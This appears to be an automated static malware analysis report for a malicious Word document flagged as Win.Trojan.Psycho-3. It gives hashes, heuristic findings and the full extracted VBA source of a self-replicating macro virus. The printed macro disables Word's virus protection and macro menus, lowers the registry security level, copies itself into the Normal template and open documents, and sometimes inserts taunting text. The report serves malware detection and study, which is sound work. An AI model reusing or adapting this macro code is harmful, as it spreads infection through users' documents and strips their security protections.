Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f209823044633dec…

MALICIOUS

Office (OLE)

29.5 KB Created: 2002-08-22 05:12:00 Authoring application: Microsoft Word 9.0 First seen: 2014-03-22
MD5: 77d12481a593f7e565016aee09b73b87 SHA-1: 74ea3cf967911019eb3457a0179c0ec9cde27d8e SHA-256: f209823044633decc16f5a74e9549b03ed48c33f32bb6ec33bffea4185ebadf8
148 Risk Score

Heuristics 4

  • ClamAV: Win.Trojan.Psycho-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Psycho-3
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
    If NTColLn > 0 Then NormTemp.CodeModule.DeleteLines 1, NTColLn
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3200 bytes
SHA-256: b9ce7dc0eaeb3fdfcfb373c2f351f0ff033c3e09b5e49482a6f5c2d15a68a227
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThissDocument"
Attribute VB_Base = "1Normal.ThissDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
' 篷腓 螓 麒蜞屮?��?耱痤觇, 珥圜栩 螓 箧?礤祉钽?�囵桫�
' ?爨牮铖圊, ?��?羼螯 躅痤��.  饮 耧囫栩咫?扈疣, ?蝾朦觐
' 螓 漕腈屙 疣珙狃囹��� 赅?铐 疣犷蜞弪 ?箐嚯栩?陪? 愉圜?.
' 蒡铗 觐?磬镨襦??麒耱?镱珥噔囹咫�睇� 鲥??(觐礤黜
' 铐 礤祉钽?脲恹? 眍 � ?礤 耦徼疣腭� 磬镨襦螯 牮篁铋 忤痼
' ?怦?镱蹂痂螯, 镳铖蝾 铐 箜梓蝾驵弪  漯筱桢 忤痼覃 ...)
' ?磬桦篦�桁� 镱驽豚龛�扈 Extremist  :-)
On Error Resume Next
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
CommandBars("Macro").Controls(3).Enabled = False
CommandBars("Macro").Controls(4).Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Else
'CommandBars("Tools").Controls("Macro").Enabled = False
Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1)
End If
Set ActDoc = ActiveDocument.VBProject.VBComponents.Item(1)
Set NormTemp = NormalTemplate.VBProject.VBComponents.Item(1)
NTColLn = NormTemp.CodeModule.CountOfLines
ADColLn = ActDoc.CodeModule.CountOfLines
BGN = 2
If ActDoc.Name <> "ThissDocument" Or ADColLn < 4 Then DoAD = True
If NormTemp.Name <> "ThissDocument" Or NTColLn < 4 Then DoNT = True
If DoNT <> True And DoAD <> True Then GoTo NoToInfect
'
If DoNT = True Then
NormTemp.Name = "ThissDocument"
If NTColLn > 0 Then NormTemp.CodeModule.DeleteLines 1, NTColLn
Do While ActDoc.CodeModule.Lines(1, 1) = ""
ActDoc.CodeModule.DeleteLines 1
Loop
NormTemp.CodeModule.AddFromString ("Private Sub Document_Close()")
Do While ActDoc.CodeModule.Lines(BGN, 1) <> ""
NormTemp.CodeModule.InsertLines BGN, ActDoc.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
'
If DoAD = True Then
ActDoc.Name = "ThissDocument"
If ADColLn > 0 Then ActDoc.CodeModule.DeleteLines 1, ADColLn
Do While NormTemp.CodeModule.Lines(1, 1) = ""
NormTemp.CodeModule.DeleteLines 1
Loop
ActDoc.CodeModule.AddFromString ("Private Sub Document_Open()")
Do While NormTemp.CodeModule.Lines(BGN, 1) <> ""
ActDoc.CodeModule.InsertLines BGN, NormTemp.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
NoToInfect:
'Destruct
If Year(Now) > 2001 And Rnd > 0.95 Then
Selection.EndKey wdStory
Selection.TypeParagraph
Selection.TypeText "Hi LameR": Selection.TypeParagraph
Selection.TypeText "The Extremist has you..": Selection.TypeParagraph
Selection.LanguageID = wdRussian
End If
'
If NTColLn <> 0 And ADColLn = 0 And (InStr(1, ActiveDocument.Name, "念牦戾眚") = False) Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
ElseIf (InStr(1, ActiveDocument.Name, "念牦戾眚") = True) Then
ActiveDocument.Saved = True: End If
End Sub